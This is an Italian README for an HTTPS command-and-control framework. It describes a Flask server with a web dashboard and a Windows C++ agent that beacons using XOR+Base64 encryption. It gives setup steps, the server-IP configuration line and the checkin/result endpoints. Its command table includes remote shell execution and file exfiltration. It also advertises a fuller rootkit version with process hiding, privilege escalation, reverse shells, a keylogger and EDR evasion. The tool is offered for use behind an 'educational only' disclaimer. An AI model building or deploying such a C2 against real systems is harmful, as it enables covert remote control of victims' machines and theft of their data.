
Framework C&C su HTTPS con beacon crittografati, dashboard web e agente Windows.

Infrastruttura di Comando e Controllo HTTPS con dashboard web per la gestione remota di agenti Windows.
⚠️ Solo per uso educativo - L'uso illegale è di tua responsabilità.
Server:
cd server
pip install flask
python c2_server.py
Accedi alla dashboard: https://localhost:8443
Client:
build.bat
Modifica client/c2_client.cpp per impostare l'IP del server:
wstring c2ServerUrl = L"https://YOUR_SERVER_IP:8443";
Cifratura: XOR + Base64
Chiave: Hostname + Username + "SecretKey2025"
Trasporto: HTTPS (porta 8443)
Agent → POST /api/checkin → Server (riceve comandi)
Agent → POST /api/result → Server (invia risultati)
Server: Python 3.9+, Flask
Client: MinGW-w64 GCC 15.2+, Windows SDK, C++17
Questo framework C2 è estratto dal progetto XvX Usermode Rootkit. La versione completa del rootkit include un C2 più completo con oltre 15 comandi, tra cui nascondere processi/file/registry, escalation dei privilegi a SYSTEM, shell interattive inverse, funzionalità di keylogger, iniezione DLL e tecniche di evasione EDR. Questa versione autonoma fornisce l'infrastruttura C2 principale per scopi educativi e una facile integrazione in progetti personalizzati.
Autore: 28zaakypro[@]proton[.]me
| Comando | Sintassi | Descrizione |
|---|
shell | shell <comando> | Esegue comando shell |
exfil | exfil <percorso> | Esfiltra file (Base64) |
sleep | sleep <secondi> | Cambia intervallo beacon |
ping | ping | Test connettività |
die | die | Termina agente |